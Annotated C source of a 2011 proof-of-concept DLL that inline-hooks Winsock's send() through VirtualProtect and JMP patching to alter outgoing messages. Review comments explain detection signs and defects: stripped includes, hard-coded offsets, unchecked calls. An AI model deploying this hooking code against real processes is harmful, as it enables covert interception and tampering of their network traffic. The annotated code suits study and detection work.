//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
// Proof of concept
//
// by Brian Mariani High-Tech Bridge
//
// www.htbridge.ch
//
// 01.09.2011
//
// Compiled with Dev-CPP 4.9.9.2
//
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
//
// What this file does, as written: a 32-bit DLL whose DllMain, on
// DLL_PROCESS_ATTACH, overwrites the first five bytes of ws2_32!send with a
// relative JMP (opcode E9) into HookFunction, then patches HookFunction's own
// body at run time (a replacement prologue at its entry, and a JMP back to
// send+5 inside its NOP sled).  The observable behaviour, for anyone looking
// for this from the detection side, is: VirtualProtect on a ws2_32 code page
// (read/write, then execute/read), a five-byte write at an exported
// function's prologue, and a DLL that modifies its own image.  There is no
// DLL_PROCESS_DETACH case, so the patch is never reverted: comparing the
// in-memory send() prologue with the on-disk image flags it for the life of
// the process.
//
// NOTE(review): the three #include directives below have lost their header
// names (presumably stripped as markup when this page was extracted); as
// shown, the translation unit does not compile.  The code also assumes a
// 32-bit process throughout: addresses are held in DWORD and handed to
// memcpy / VirtualProtect as integers, and every hook offset is hard-coded.
#include
#include
#include

// Hook body that send() is redirected to.  The C locals Text and sizeMsg are
// never referenced by name; the inline asm appears to rely on the compiler
// leaving their values in eax / on the stack when it is reached — that is an
// assumption about generated code, not something this source guarantees.
__declspec(naked) HookFunction() {
    char Text = "You friend is suddenly busy sorry.. :] \n";  // NOTE: a single char initialised from a pointer
    int sizeMsg = 40;
    // Some GCC inline asm here.  (The author's original comment ended in a
    // backslash; in C that splices the following physical line into the
    // comment, which — depending on the original layout — may have hidden
    // the first __asm statement below.  The backslash is dropped here.)
    __asm("movl %eax,0xC(%ebp)");   // Put msg param into stack
    __asm("pop %eax");              // Take msglen from stack
    __asm("movl %eax,0x10(%ebp)");  // Put msglen into stack
    __asm("pop %eax");              // Sub dword from stack
    __asm("popf");                  // Restore Flags
    __asm("mov %edi,%edi");
    __asm("push %ebp");
    // } Hard-coded preamble taken from Ws2_32.dll's send().  Author's note:
    // "Too lazy today :} Do a VirtualProtect and memcpy of your own."
    __asm("mov %ebp,%esp");
    // NOP sled.  DllMain later overwrites five of these bytes, at a
    // hard-coded offset from HookFunction's entry, with a JMP back to send+5;
    // the offset therefore depends on the exact code layout the compiler
    // produced for this function.
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    // If you desire to add some functionalities :]
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    __asm("nop");
    // 1 byte JMP + 4 bytes for address.
    __asm("nop");
    __asm("nop");
    __asm("nop");
}

// DLL entry point.  Installs the inline hook on DLL_PROCESS_ATTACH; every
// other reason falls through the switch and returns TRUE.  None of the
// GetModuleHandle, GetProcAddress or VirtualProtect return values is checked,
// so a module that is not loaded or a failed protection change ends in a
// write through a NULL or still-protected address.
BOOL APIENTRY DllMain (HINSTANCE hInst,DWORD reason,LPVOID reserved) {
    char JmpOpcode[1] = "\xE9";                     // JMP rel32 (array is exactly one byte; no terminator)
    char SavesOpcodes[5] = "\x90\x90\x90\x90\x90";  // receives send()'s original first five bytes; never read back here
    char OpcodesMyFunc[3] = "\x9C\x8B\xEC";         // pushf ; mov ebp,esp — written over HookFunction's own entry
    DWORD AddressToWriteTrampolineToSend;
    DWORD CalculateJumpFromHookFunctionToWsaSend,CalculateAddressTrampoline;
    DWORD lpflOldProtect = 0;
    DWORD OldProtect = 0;
    HMODULE HandleModule;
    DWORD AddressAPI;       // address of ws2_32!send, kept as an integer (32-bit only)
    DWORD AddresseFakeApi;  // address of HookFunction, likewise
    DWORD calculateJMP,JMP_TO;
    switch (reason) {
    case DLL_PROCESS_ATTACH:
        HandleModule = GetModuleHandle(TEXT("ws2_32.dll"));  // Module handle of ws2_32.dll (assumes it is already loaded)
        AddressAPI = GetProcAddress(HandleModule,"send");    // Address of the send API
        AddresseFakeApi = (LPDWORD)&HookFunction;            // Address of HookFunction
        memcpy(SavesOpcodes,AddressAPI,0x5);  // Save the original prologue bytes.  Author: "You can use them later with memcpy or hardcode them into your HookFunction." (this file hard-codes them)
        calculateJMP = AddresseFakeApi - AddressAPI;  // Distance from send to the hook
        JMP_TO = calculateJMP - 5;                    // rel32 is measured from the end of the 5-byte JMP
        VirtualProtect(AddressAPI,0x8,PAGE_READWRITE,&lpflOldProtect);  // Disable memory protection on send's page (result unchecked)
        memcpy(AddressAPI,JmpOpcode,0x1);   // Write JMP opcode
        memcpy(AddressAPI+1,&JMP_TO,0x4);   // Write jump displacement
        VirtualProtect(AddressAPI,0x8,PAGE_EXECUTE_READ,&lpflOldProtect);  // Back to execute/read (a fixed value, not the saved lpflOldProtect)
        // New
        VirtualProtect(AddresseFakeApi,0x3,PAGE_READWRITE,&OldProtect);  // Disable memory protection on HookFunction's entry.
        memcpy(AddresseFakeApi,OpcodesMyFunc,0x3);  // "\x9C\x8B\xEC" -> HookFunction entry
        VirtualProtect(AddresseFakeApi,0x3,PAGE_EXECUTE_READ,&OldProtect);  // Enable memory protection.
        //__asm("int3"); // 0xCC breakpoint, for debugging purposes.
        AddressToWriteTrampolineToSend = AddresseFakeApi + 0x32;  // Where the JMP back is written: a hard-coded offset into HookFunction's NOP sled (an earlier value, 1e, was left in the author's comment).  Any change to HookFunction or to the compiler moves it.
        CalculateAddressTrampoline = AddressAPI + 0x5;  // First instruction after the copied preamble (author observed it at 7651C4CD: SUB ESP,10)
        CalculateJumpFromHookFunctionToWsaSend = CalculateAddressTrampoline - AddressToWriteTrampolineToSend - 0x5;  // rel32 for the JMP written below
        VirtualProtect(AddressToWriteTrampolineToSend,0x8,PAGE_READWRITE,&OldProtect);  // Disable memory protection @ HookFunction
        memcpy(AddressToWriteTrampolineToSend,JmpOpcode,0x1);  // Copy unconditional JMP opcode
        memcpy(AddressToWriteTrampolineToSend+1,&CalculateJumpFromHookFunctionToWsaSend,0x4);  // Copy jump displacement
        VirtualProtect(AddressToWriteTrampolineToSend,0x8,PAGE_EXECUTE_READ,&OldProtect);  // Enable memory protection @ HookFunction
        break;
    }
    return TRUE;
}